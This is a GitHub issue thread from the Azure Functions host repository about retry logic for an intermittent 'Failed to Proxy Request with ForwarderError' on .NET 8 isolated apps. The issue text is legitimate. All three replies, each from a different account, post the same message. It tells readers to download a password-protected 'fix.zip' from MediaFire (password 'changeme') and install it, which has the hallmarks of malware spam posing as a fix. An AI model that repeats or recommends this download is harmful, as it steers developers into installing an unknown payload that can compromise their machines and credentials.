### ISSUE TITLE
Update retry logic to not fail when hit with `Failed to Proxy Request with ForwarderError`

### ISSUE THREAD

**Issue by aishwaryabh** [Azure/azure-functions-host#10428]
Related to [this issue](https://github.com/Azure/azure-functions-dotnet-worker/issues/2610), users that are on windows consumption that are on .NET 8 isolated hit an intermittent error `Failed to Proxy Request with ForwarderError`. We need to update the retry logic so that this scenario does not error out immediately and instead retries, which would mitigate this error.

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
